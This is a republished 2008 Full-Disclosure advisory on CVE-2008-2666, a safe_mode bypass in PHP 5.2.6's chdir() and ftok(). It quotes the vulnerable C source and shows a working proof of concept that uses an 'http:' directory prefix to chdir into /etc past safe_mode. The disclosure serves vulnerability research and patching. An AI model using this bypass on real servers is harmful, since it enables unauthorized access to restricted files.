Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20073
HistoryJun 23, 2008 - 12:00 a.m.

[Full-disclosure] PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass

2008-06-2300:00:00
vulners.com
66

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:

    • Written: 10.05.2008
    • Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 55

CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net

  • — 0.Description —

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.

chdir ? Change directory

SYNOPSIS:

bool chdir ( string $directory )

http://pl.php.net/manual/en/function.chdir.php

ftok ? Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:

int ftok ( string $pathname , string $proj )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL
VULNERABLE FUNCTIONS

  • — 1. chdir(), ftok() (from standard ext) and more safe_mode bypass —
    Let's see to chdir() function

PHP_FUNCTION(chdir)
{
char *str;
int ret, str_len;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
            RETURN_FALSE;
    }

    if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) ||

php_check_open_basedir(str TSRMLS_CC)) {
RETURN_FALSE;
}
ret = VCWD_CHDIR(str);

    if (ret != 0) {
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno),

errno);
RETURN_FALSE;
}

    RETURN_TRUE;

}


str is beeing checked by safe_mode
example:


Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to
access / owned by uid 0 in /www/mb/mb.php on line 8


in current directory, we should create subdir "http:". => it is possible to create
chdir("http://…/…/…/…/…/…/")
and we are in /

Why?

TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) ||
php_check_open_basedir(str TSRMLS_CC)))

for
str="http://…/…/…/…/…/…/"

safe_mode will ignore all paths with http://

that same situation with ftok() function (and more)

  • —EXAMPLE1—
    cxib# cat /www/wufff.php
    <?
    echo getcwd()."\n";
    chdir("/etc/");
    echo getcwd()."\n";
    ?>
    cxib# ls -la /www/wufff.php
  • -rw-r–r-- 1 www www 62 Jun 17 17:14 /www/wufff.php
    cxib# php /www/wufff.php
    /www

Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to
access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#

  • —/EXAMPLE1—

  • —EXAMPLE2—
    cxib# ls -la /www/wufff.php

  • -rw-r–r-- 1 www www 74 Jun 17 17:13 /www/wufff.php
    cxib# ls -la /www/http:
    total 8
    drwxr-xr-x 2 www www 512 Jun 17 17:12 .
    drwxr-xr-x 19 www www 4608 Jun 17 17:13 …
    cxib# cat /www/wufff.php
    <?
    echo getcwd()."\n";
    chdir("http://…/…/etc/");
    echo getcwd()."\n";
    ?>
    cxib# php /www/wufff.php
    /www
    /etc
    cxib#

  • —/EXAMPLE2—

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LISTS ALL
VULNERABLE FUNCTIONS

iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9
W6fcb5TR6GxN9osji+wQCqM=
=tyyL
-----END PGP SIGNATURE-----


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/